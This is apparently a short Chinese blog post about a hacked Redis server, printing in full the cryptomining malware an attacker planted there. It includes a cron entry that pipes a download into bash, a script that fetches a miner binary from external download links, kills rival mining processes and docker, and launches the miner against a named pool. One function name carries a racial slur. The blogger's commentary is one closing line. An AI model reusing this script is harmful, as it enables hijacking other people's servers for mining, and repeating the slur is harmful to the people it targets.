发现有人利用redis权限写入挖矿脚本
xxx(被入侵的主机):6379> get weaponZ
-
"\n*/7 * * * * wget -q -O- --no-check-certificate | bash\n"
-
#!/bin/bash
-
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
-
getLittletrump(){
-
ARCH=$(uname -i)
-
if [ "$ARCH" == "x86_64" ]
-
then
-
rm -rf /tmp/littletrump*
-
wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
-
if [ $? -ne 0 -a $PS2 -eq 0 ];
-
then
-
curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
-
fi
-
elif [ "$ARCH" == "i386" ]
-
then
-
rm -rf /tmp/littletrump*
-
wget https://pixeldra.in/api/download/NxQkhz --no-check-certificate -O /tmp/littletrump
-
if [ $? -ne 0 -a $PS2 -eq 0 ];
-
then
-
curl -sk https://pixeldra.in/api/download/NxQkhz -o /tmp/littletrump
-
fi
-
else
-
rm -rf /tmp/littletrump*
-
wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
-
if [ $? -ne 0 -a $PS2 -eq 0 ];
-
then
-
curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
-
fi
-
fi
-
}
-
-
killNiggiz(){
-
ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep udevd | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep docker | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep hashvault | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep moneroocean | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep evolutions | grep -v grep | awk '{print $2}' | xargs kill -9
-
skill -KILL crypto-pool
-
skill -KILL nanopool
-
skill -KILL supportxmr
-
skill -KILL minexmr
-
skill -KILL dwarfpool
-
skill -KILL xmrpool
-
skill -KILL moneropool
-
skill -KILL xmr
-
skill -KILL monero
-
skill -KILL udevs
-
skill -KILL udevd
-
skill -KILL docker
-
skill -KILL hashvault
-
skill -KILL moneroocean
-
skill -KILL evolutions
-
}
-
-
killNiggiz
-
-
PS2=$(ps aux | grep littletrump | grep -v "grep" | wc -l)
-
if [ $PS2 -eq 0 ];
-
then
-
getLittletrump
-
fi
-
chmod +x /tmp/littletrump
-
chmod 777 /tmp/littletrump
-
if [ $PS2 -eq 0 ];
-
then
-
/tmp/littletrump -o pool.t00ls.ru -k -B
-
fi
函数名称居然叫做'杀死黑鬼',而且挖矿程序名称叫做“小川普”感觉是老美的家伙干的,挺猥琐的杀死其他人的挖矿进程,然后启动自己的进程挖矿
阅读(4803) | 评论(0) | 转发(0) |